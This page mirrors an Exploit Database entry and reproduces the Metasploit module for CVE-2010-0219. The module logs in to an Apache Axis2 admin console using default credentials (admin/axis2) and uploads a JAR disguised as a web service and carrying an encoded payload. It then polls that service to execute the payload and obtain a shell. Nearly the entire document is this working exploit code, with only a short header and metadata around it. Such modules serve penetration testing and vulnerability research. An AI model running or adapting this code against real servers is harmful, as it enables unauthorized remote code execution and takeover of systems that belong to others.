Axis2 – (Authenticated) Code Execution (via REST) (Metasploit)

• Exploit Database
• 100 阅读

• 作者： Metasploit
  日期： 2010-12-14
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/16312/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232

  ## # $Id: axis2_deployer_rest.rb 11330 2010-12-14 17:26:44Z egypt $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##     require &apos;msf/core&apos;     class Metasploit3 < Msf::Exploit Rank = ExcellentRanking   HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }   include Msf::Exploit::Remote::HttpClient   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Axis2 Authenticated Code Execution (via REST)&apos;, &apos;Version&apos; => &apos;$Revision: 11330 $&apos;, &apos;Description&apos; => %q{ This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using REST. }, &apos;References&apos;=> [ # General [ &apos;URL&apos;, &apos;http://www.rapid7.com/security-center/advisories/R7-0037.jsp&apos; ], [ &apos;URL&apos;, &apos;http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf&apos; ], [ &apos;CVE&apos;, &apos;2010-0219&apos; ], ], &apos;Platform&apos; => [ &apos;java&apos;, &apos;win&apos;, &apos;linux&apos; ], # others? &apos;Targets&apos; => [ [ &apos;Java&apos;, { &apos;Arch&apos; => ARCH_JAVA, &apos;Platform&apos; => &apos;java&apos; }, ], # # Platform specific targets only # [ &apos;Windows Universal&apos;, { &apos;Arch&apos; => ARCH_X86, &apos;Platform&apos; => &apos;win&apos; }, ],   [ &apos;Linux X86&apos;, { &apos;Arch&apos; => ARCH_X86, &apos;Platform&apos; => &apos;linux&apos; }, ], ], &apos;Author&apos; => [ &apos;Joshua Abraham <jabra[at]rapid7.com>&apos; ], &apos;License&apos; => MSF_LICENSE ))   register_options( [ Opt::RPORT(8080), OptString.new(&apos;USERNAME&apos;, [ false, &apos;The username to authenticate as&apos;,&apos;admin&apos; ]), OptString.new(&apos;PASSWORD&apos;, [ false, &apos;The password for the specified username&apos;,&apos;axis2&apos; ]), OptString.new(&apos;PATH&apos;, [ true,"The URI path of the axis2 app", &apos;/axis2&apos;]) ], self.class) register_autofilter_ports([ 8080 ]) end   def upload_exec(session) contents=&apos;&apos; name = Rex::Text.rand_text_alpha(8) services_xml = %Q{ <service name="#{name}" scope="application"> <description> #{Rex::Text.rand_text_alphanumeric(50 + rand(50))} </description> <messageReceivers> <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-only" class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/> <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/> </messageReceivers> <parameter name="ServiceClass"> metasploit.PayloadServlet </parameter> </service> } if target.name =~ /Java/ zip = payload.encoded_jar zip.add_file("META-INF/services.xml", services_xml)   # We need this class as a wrapper to run in a thread.For some reason # the Payload class is giving illegal access exceptions without it. path = File.join(Msf::Config.install_root, "data", "java", "metasploit", "PayloadServlet.class") fd = File.open(path, "rb") servlet = fd.read(fd.stat.size) fd.close zip.add_file("metasploit/PayloadServlet.class", servlet)   contents = zip.pack else   end   boundary = rand_text_alphanumeric(6)   data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"filename\"; " data << "filename=\"#{name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n" data << contents data << "\r\n--#{boundary}--"   res = send_request_raw({ &apos;uri&apos; => "/#{datastore[&apos;PATH&apos;]}/axis2-admin/upload", &apos;method&apos;=> &apos;POST&apos;, &apos;data&apos; => data, &apos;headers&apos; => { &apos;Content-Type&apos; => &apos;multipart/form-data; boundary=&apos; + boundary, &apos;Content-Length&apos; => data.length, &apos;Cookie&apos; => "JSESSIONID=#{session}", } }, 25)   if (res and res.code == 200) print_status("Successfully uploaded") else print_error("Error uploading #{res}") return end =begin res = send_request_raw({ &apos;uri&apos; => "/#{datastore[&apos;PATH&apos;]}/axis2-web/HappyAxis.jsp", &apos;method&apos;=> &apos;GET&apos;, &apos;headers&apos; => { &apos;Cookie&apos; => "JSESSIONID=#{session}", } }, 25) puts res.body puts res.code if res.code > 200 and res.code < 300 if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) ) dir = $1.sub(/: /,&apos;:&apos;) + "\\webapps\\dswsbobje\\WEB-INF\\services\\" puts dir else if ( a.scan(/catalina\.home<\/th><td style=".*">(.*)&nbsp;<\/td>/i) ) dir = $1 + "/webapps/dswsbobje/WEB-INF/services/" puts dir end end end =end   print_status("Polling to see if the service is ready") # Try to execute the payload 1.upto 5 do Rex::ThreadSafe.sleep(3) res = send_request_raw({ &apos;uri&apos; => "/#{datastore[&apos;PATH&apos;]}/services/#{name}/run", &apos;method&apos;=> &apos;GET&apos;, &apos;headers&apos; => { &apos;Cookie&apos; => "JSESSIONID=#{session}", } }, 25) if res.code >= 200 and res.code < 300 # This should usually mean we got a shell break end end   end   def exploit user = datastore[&apos;USERNAME&apos;] pass = datastore[&apos;PASSWORD&apos;] path = datastore[&apos;PATH&apos;] success = false srvhdr = &apos;?&apos; begin res = send_request_cgi( { &apos;method&apos; => &apos;POST&apos;, &apos;uri&apos; => "/#{path}/axis2-admin/login", &apos;ctype&apos;=> &apos;application/x-www-form-urlencoded&apos;, &apos;data&apos; => "userName=#{user}&password=#{pass}&submit=+Login+", }, 25)   if not (res.kind_of? Rex::Proto::Http::Response) raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin not responding") end   if res.code == 404 raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin returned code 404") end   srvhdr = res.headers[&apos;Server&apos;] if res.code == 200 # Could go with res.headers["Server"] =~ /Apache-Coyote/i # as well but that seems like an element someone&apos;s more # likely to change   success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1) if (res.headers[&apos;Set-Cookie&apos;] =~ /JSESSIONID=(.*);/) session = $1 end end   rescue ::Rex::ConnectionError print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin Unable to attempt authentication") end   if success print_good("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login &apos;#{user}&apos; : &apos;#{pass}&apos;") upload_exec(session) else print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as &apos;#{user}&apos;") end end   end